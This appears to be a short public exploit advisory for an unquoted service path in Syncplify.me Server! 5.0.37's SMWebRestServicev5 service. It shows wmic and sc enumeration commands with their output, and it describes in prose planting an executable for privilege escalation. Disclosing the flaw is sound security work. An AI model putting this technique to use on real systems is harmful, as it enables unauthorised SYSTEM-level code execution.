38 lines
No EOL
1.6 KiB
Text
38 lines
No EOL
1.6 KiB
Text
# Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
|
|
# Date: 2020-11-08
|
|
# Exploit Author: Julio Aviña
|
|
# Vendor Homepage: https://www.syncplify.me/
|
|
# Software Link: https://download.syncplify.me/SMServer_Setup.exe
|
|
# Version: 5.0.37
|
|
# Tested on: Windows 10 Pro x64 es
|
|
# Vulnerability Type: Unquoted Service Path
|
|
|
|
|
|
# 1. To find the unquoted service path vulnerability
|
|
|
|
C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname
|
|
|
|
DisplayName PathName StartMode StartName
|
|
Syncplify.me Web/REST Server! v5 C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe Auto LocalSystem
|
|
|
|
# 2. To check service info:
|
|
|
|
C:\>sc qc "SMWebRestServicev5"
|
|
[SC] QueryServiceConfig CORRECTO
|
|
|
|
NOMBRE_SERVICIO: SMWebRestServicev5
|
|
TIPO : 10 WIN32_OWN_PROCESS
|
|
TIPO_INICIO : 2 AUTO_START
|
|
CONTROL_ERROR : 1 NORMAL
|
|
NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe
|
|
GRUPO_ORDEN_CARGA :
|
|
ETIQUETA : 0
|
|
NOMBRE_MOSTRAR : Syncplify.me Web/REST Server! v5
|
|
DEPENDENCIAS :
|
|
NOMBRE_INICIO_SERVICIO: LocalSystem
|
|
|
|
|
|
# 3. Exploit:
|
|
|
|
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
|
|
When restarting the service or the system, the inserted executable will run with elevated privileges. |